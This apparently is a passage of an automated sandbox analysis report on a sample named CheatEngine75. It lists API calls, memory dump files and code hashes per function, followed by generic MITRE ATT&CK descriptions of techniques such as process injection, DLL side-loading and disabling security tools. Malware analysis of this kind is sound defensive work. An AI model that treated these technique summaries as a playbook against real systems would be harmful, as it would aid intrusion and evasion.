GetClientRect.USER32(?,?), ref: 6B4F0AB5
PtInRect.USER32(?,?,?), ref: 6B4F0AE3

Strings

0#Lk, xrefs: 6B4F0B1D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Rect$Client
String ID: 0#Lk
API String ID: 2075624825-1841850333
Opcode ID: df1b0f4691ca218b73e282f0891ee314d416a59eae9f77aaa0f44e0b47aa5975
Instruction ID: 5b3a472614d303ec8e9b835662a45b80aa95deb088a9c2e41f008c5fb2b46cb4
Opcode Fuzzy Hash: df1b0f4691ca218b73e282f0891ee314d416a59eae9f77aaa0f44e0b47aa5975
Instruction Fuzzy Hash: C5211971901209DFCF05DFB8C990EEE7BB9EF49245B0040BAD809EB251DB399905CB60

Function 6B4CBBD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6B4CBBE4
GetParent.USER32(?), ref: 6B4CBC2B

Part of subcall function 6B4CBC4E: SetWindowLongW.USER32(?,000000FC,Function_0000781E), ref: 6B4CBC92

Strings

0#Lk, xrefs: 6B4CBC0D

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ItemLongParentWindow
String ID: 0#Lk
API String ID: 869538736-1841850333
Opcode ID: 685ada596e531f4ecfd07b49f18dc4a63d7e2b2b72bb9a4b06fde455c2e86e2a
Instruction ID: 46bbdbe71ac25344865ca169b3ba89ddac96ee5fa54f0df06cce0a7b61f54ed0
Opcode Fuzzy Hash: 685ada596e531f4ecfd07b49f18dc4a63d7e2b2b72bb9a4b06fde455c2e86e2a
Instruction Fuzzy Hash: 15018C39700609ABDB095B36CD01E6AB7A9EF49A41700007DE802D3261EF78EE008B91

Function 6B4FCB8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 6B4FCBB0
CopyRect.USER32(?,?), ref: 6B4FCBC2

Strings

(, xrefs: 6B4FCBA9

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: c961785fe197df13f06358a6cfe663e7fdd31172a93ab3df4696b7f65ce70633
Instruction ID: a1ee307639a5a782131ea49d48e8467d719ee5416338adada33609b29a7ce447
Opcode Fuzzy Hash: c961785fe197df13f06358a6cfe663e7fdd31172a93ab3df4696b7f65ce70633
Instruction Fuzzy Hash: D211D3B5A00609DFCB10DFA9D580D9EB7F9FB09240B508859E496E7200D734FA85CB61

Function 6B4EEB2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 6B4EEB43

Part of subcall function 6B4EF3D3: __EH_prolog3.LIBCMT ref: 6B4EF3DA
Part of subcall function 6B4EF3D3: SendMessageW.USER32(?,000000B0,?,?), ref: 6B4EF41D

SendMessageW.USER32(?,000000B0,0000002E,?), ref: 6B4EEB87

Strings

., xrefs: 6B4EEB5F

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: MessageSend$H_prolog3State
String ID: .
API String ID: 1947833932-248832578
Opcode ID: 5899aff360f8a0e5490019af948f551f76263ef1b3480e62fe3f7820314bcf22
Instruction ID: 5a0beee206d73ff4bd7af160710a38641675d60a76c16847c91da0f086bfd1b4
Opcode Fuzzy Hash: 5899aff360f8a0e5490019af948f551f76263ef1b3480e62fe3f7820314bcf22
Instruction Fuzzy Hash: 7C019A35650208BFDF549F64CC85F9E7B76EB40356F004059E90546260DB798A92DBA1

Function 6B4D39AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4D39B4

Part of subcall function 6B4D3463: TlsAlloc.KERNEL32(?,6B4D39E0,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3482
Part of subcall function 6B4D3463: InitializeCriticalSection.KERNEL32(6B69434C,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3493

Strings

0Cik, xrefs: 6B4D39D0
0#Lk, xrefs: 6B4D3A0F

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AllocCriticalH_prolog3InitializeSection
String ID: 0#Lk$0Cik
API String ID: 2369468792-2259712927
Opcode ID: 45b20c88f28d3f74c29604d72d72579f3b858184c1a0160f420d3cd388b1305f
Instruction ID: 527f6b714bd9ee19b4e7e78208311938cd6ddaf14914fd5a4f6291b739e4d818
Opcode Fuzzy Hash: 45b20c88f28d3f74c29604d72d72579f3b858184c1a0160f420d3cd388b1305f
Instruction Fuzzy Hash: 55015A74B002139BDB34AF7AC966B5E37B1BF51394B00017DE8659B390EB78C942CB84

Function 6B4C882B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 6B4C8870
CallWindowProcW.USER32(?,?,?,?,?), ref: 6B4C8879

Strings

0#Lk, xrefs: 6B4C8853

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ProcWindow$Call
String ID: 0#Lk
API String ID: 2316559721-1841850333
Opcode ID: 6488681df098e30b92e090ea7609f75237be248b03772bad2491ca759ad2e859
Instruction ID: 00ec3e0bd6cf74e7ae748b8d5aa5acf5efa05b3d533cab983846703628508cb5
Opcode Fuzzy Hash: 6488681df098e30b92e090ea7609f75237be248b03772bad2491ca759ad2e859
Instruction Fuzzy Hash: A1F01D36200115FFCF065F96CC04EAEBB76FF89751B044066F90486A20D735D460EBA5

Function 6B4E4F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(!MNk,?,?,?,?,?,?,6B4E4D21,?,?,?,?,?,?,?,?), ref: 6B4E4F22
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6B4E4D21,?,?,?,?,?,?,?,?), ref: 6B4E4F34

Strings

!MNk, xrefs: 6B4E4F1A, 6B4E4F21

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: !MNk
API String ID: 1748579591-4111651727
Opcode ID: 0ca552bf2f2fe8a0d50a77f58c619ad9aeadd6677971d8ab81ba5ab5f642a96a
Instruction ID: 83a107d54eb74b0ecbce9fb98ddf8dce232842505e388833870e29c09172c848
Opcode Fuzzy Hash: 0ca552bf2f2fe8a0d50a77f58c619ad9aeadd6677971d8ab81ba5ab5f642a96a
Instruction Fuzzy Hash: 67F03071A1010AABDF44EFB5C945EAF73FCAB0968574044699506D7140EE38E6068774

Function 6B4C2B20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6B4C2B25

Part of subcall function 6B601AA1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6B601AAD

___std_exception_copy.LIBVCRUNTIME ref: 6B4C2B4E

Strings

string too long, xrefs: 6B4C2B20

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: c67eb265ad0636fb6f4264cc5339cfd2d769a126e213efeec6309e861157a38e
Instruction ID: 3d257ee284170e037c82320d479441309cf280d79763b83338d219ed67a793db
Opcode Fuzzy Hash: c67eb265ad0636fb6f4264cc5339cfd2d769a126e213efeec6309e861157a38e
Instruction Fuzzy Hash: C1E08CF291031867C214AFA9E802882B79CDE15598754852AF648B7200FB38E58047E5

Function 6B4CD9E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

FindActCtxSectionStringW.KERNEL32(?,6B4CE068,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 6B4CDA29

Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2

Strings

FindActCtxSectionStringW, xrefs: 6B4CD9F2
0#Lk, xrefs: 6B4CDA23

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressDeactivateFindProcSectionString
String ID: 0#Lk$FindActCtxSectionStringW
API String ID: 3637780246-1165226017
Opcode ID: a59d97419015a5e8f6ce9f5ad42ee1abb87b4a23911de1194acf05b0513a8da7
Instruction ID: 5f55b19f2e0f693db623fa39ecd698c840c6f86997cdb438e5d846afa03f8343
Opcode Fuzzy Hash: a59d97419015a5e8f6ce9f5ad42ee1abb87b4a23911de1194acf05b0513a8da7
Instruction Fuzzy Hash: 08E06D7694553AAB8F226E829D00C9B3F25BB05AA07004055FA1866231C776CC209BE1

Function 6B4CD9A1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

DeactivateActCtx.KERNEL32(?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CD9DD

Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2

Strings

DeactivateActCtx, xrefs: 6B4CD9AF
0#Lk, xrefs: 6B4CD9D7

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Deactivate$AddressProc
String ID: 0#Lk$DeactivateActCtx
API String ID: 1847594590-1065500476
Opcode ID: cada74f006a78d070d4607fbba46e30235c5e8f6a6dfe489dae7b473a22f4b16
Instruction ID: 5e141ba880db0b43da6b4c6ea362b2c1fbb3f8a7d0308cba9f766c86ef3ed617
Opcode Fuzzy Hash: cada74f006a78d070d4607fbba46e30235c5e8f6a6dfe489dae7b473a22f4b16
Instruction Fuzzy Hash: 38E08C7698193A6BCF223E569800D8BBF64FA41BA53014156FC19AB220C77ADC1087E1

Function 6B4CD851 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

ActivateActCtx.KERNEL32(?,6B4CDD3B,0000000C,-00000034,?,6B4D33E8,00000000,6B67C1E8,00000010,6B4D3F31,00000000,?,00000000), ref: 6B4CD88D

Part of subcall function 6B4CDD74: DeactivateActCtx.KERNEL32(?,6B4CD9C3,6B638ED4,6B69429C,DeactivateActCtx,00000000,?,6B4D3457,00000000,00000000,6B4D340D), ref: 6B4CDD95
Part of subcall function 6B4CDD74: GetProcAddress.KERNEL32(00000000,00000000), ref: 6B4CDDA2

Strings

ActivateActCtx, xrefs: 6B4CD85F
0#Lk, xrefs: 6B4CD887

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ActivateAddressDeactivateProc
String ID: 0#Lk$ActivateActCtx
API String ID: 3239892334-1248373386
Opcode ID: 7c5d3ac089f1efdd173b8a417c54bb0cbeeada0e526b038cb457538c31fd3bad
Instruction ID: 968b4d2d24d0439f55af09b876e078d9eab131410de6526001140147136760a2
Opcode Fuzzy Hash: 7c5d3ac089f1efdd173b8a417c54bb0cbeeada0e526b038cb457538c31fd3bad
Instruction Fuzzy Hash: 3AE08672D81535678F213E97CC10D8B7F68FA11AA13014065FC14A7320C775DC108BF1

Function 6B4D3A52 Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A5E
TlsGetValue.KERNEL32(6B694330,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A72
LeaveCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A8C
LeaveCriticalSection.KERNEL32(6B69434C,?,?,?,?,6B4D3A4E,00000000,00000004,6B4D0260,Function_00010251,6B4D03EB,6B4C645A,?,?,?), ref: 6B4D3A97

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 870e29439619bbe02851cf42c96259c11ea691c18060df70913ae7ea248b3e63
Instruction ID: f4ad808b9bf52799393ad2c14afe8f0ebd5b546602e5851c10041ab5709cdb41
Opcode Fuzzy Hash: 870e29439619bbe02851cf42c96259c11ea691c18060df70913ae7ea248b3e63
Instruction Fuzzy Hash: 19F090327042159FEB30AFA6C858E9AB768EF067753454469E815A7320C739E8058BA0

Description:	Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
Tactics:	Reconnaissance
Data Sources:	Internet Scan: Response Content
Platforms:	PRE
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
